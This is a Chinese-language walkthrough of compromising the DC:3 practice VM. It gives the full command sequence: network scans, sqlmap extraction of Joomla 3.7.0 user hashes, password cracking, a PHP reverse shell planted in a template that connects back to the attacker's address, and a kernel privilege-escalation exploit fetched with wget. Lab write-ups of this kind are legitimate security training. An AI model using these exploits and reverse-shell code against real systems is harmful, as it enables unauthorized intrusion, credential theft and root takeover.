DC系列 DC:3

DC系列 DC:3

文章目录

  • DC系列 DC:3
    • 调试靶机
    • 信息收集
      • IP端口信息收集
    • 框架漏洞利用
      • joomscan扫描工具利用
      • msf工具利用(无法使用)
      • kali漏洞库利用
      • sqlmap利用
    • 文件上传
    • 提权

调试靶机

点击虚拟机设置选择CD/DVD点击高级将IDE调成画面中这个选项
DC系列 DC:3_第1张图片

信息收集

IP端口信息收集

对自己网段进行扫描快速锁定ip
arp-scan 10.4.7.0/24
DC系列 DC:3_第2张图片
nmap -A 10.4.7.22对端口服务进行详细扫描
DC系列 DC:3_第3张图片
可以看到目标机开放着http服务 框架为joomla

框架漏洞利用

joomscan扫描工具利用

用joomscan对改目标机进行扫描
joomscan -u http://10.4.7.22 --ec
DC系列 DC:3_第4张图片

msf工具利用(无法使用)

用msf查找版本漏洞
DC系列 DC:3_第5张图片
使用漏洞并使用php/meterpreter/reverse_tcp攻击载荷
DC系列 DC:3_第6张图片
添加攻击地址进行攻击发现没用连不上
DC系列 DC:3_第7张图片

kali漏洞库利用

在kali的漏洞库里进行搜索漏洞
searchsploit oomla 3.7.0
DC系列 DC:3_第8张图片
发现该版本是存在sql注入漏洞的我们查看该文件

  • locate php/webapps/42033.txt获取文件绝对路径
  • cat /usr/share/exploitdb/exploits/php/webapps/42033.txt查看文件
    DC系列 DC:3_第9张图片

sqlmap利用

给我们提供了该框架sql注入的地址和sqlmap语句我们直接跑
sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs
DC系列 DC:3_第10张图片
可能时间会有点长最后跑出5个库
DC系列 DC:3_第11张图片
我们继续跑查看joomladb库里有什么

sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  -D "joomladb" --tables   

DC系列 DC:3_第12张图片
跑出来user表我们继续跑里面的字段

sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  -D "joomladb" -T "#__users" --column  

DC系列 DC:3_第13张图片
跑出来很多字段我们重点关注username和password
DC系列 DC:3_第14张图片
我们跑出来看看

sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  -D "joomladb" -T "#__users" -C "username,password" --dump 

得到了账号密码但密码时加密的
DC系列 DC:3_第15张图片
我们用将密钥保存到文档里用john进行解密
DC系列 DC:3_第16张图片
得到密码snooy我们去joomla进行登录
这个页面joomscan扫到的
DC系列 DC:3_第17张图片
用账号密码进行登录
DC系列 DC:3_第18张图片
登录成功

文件上传

在extcnsions里选择templates中的templates里选择第二个(已经试过第一个了没反应)
DC系列 DC:3_第19张图片
找到index.php
DC系列 DC:3_第20张图片
上传小马

$sock = fsockopen("10.4.7.3", "10002");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);

点击保存
DC系列 DC:3_第21张图片
kali开启nc nc -lvvp 10002
在这里插入图片描述

访问index.php页面http://10.4.7.22/index.php
DC系列 DC:3_第22张图片
反弹成功
DC系列 DC:3_第23张图片

提权

进来之后先加一层壳python -c "import pty;pty.spawn('/bin/bash')"
在这里插入图片描述
查询系统版本cat /etc/*release
DC系列 DC:3_第24张图片
发现版本是Ubuntu 16.04去kali漏洞库里进行搜索searchsploit Ubuntu 16.04
DC系列 DC:3_第25张图片
下载下来查看searchsploit -m 39772.txt
DC系列 DC:3_第26张图片
查看文本文件 cat 39772.txt
DC系列 DC:3_第27张图片
发现该文件给了我们要使用的文件方法 并且跟我们说使用完60秒内就会变为root权限 并且给了我们下载地址
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip我们进行下载
DC系列 DC:3_第28张图片
下载完成我进行了解压传入了kali
DC系列 DC:3_第29张图片
在里面找到exploit.tar文件并在当前目录开启http服务传入目标机python -m http.server 80
在这里插入图片描述
在shell里cd 到tmp目录下用wget命令传入靶机http://10.4.7.3/exploit.tar
DC系列 DC:3_第30张图片
用tar命令进行解压tar xvf exploit.tar
DC系列 DC:3_第31张图片
cd到解压好的文件夹里对脚本文件进行赋权777 chmod 777 compile.sh chmod 777 doubleput.c
DC系列 DC:3_第32张图片
执行两个脚本文件
第一个执行时可能会报错但是没事进行执行第二个就好
/compile.sh
DC系列 DC:3_第33张图片
./doubleput
DC系列 DC:3_第34张图片
执行完成等待一会就成为root了
cd到root下拿下旗帜
DC系列 DC:3_第35张图片

你可能感兴趣的:(渗透,靶机,DC系列,靶机,渗透)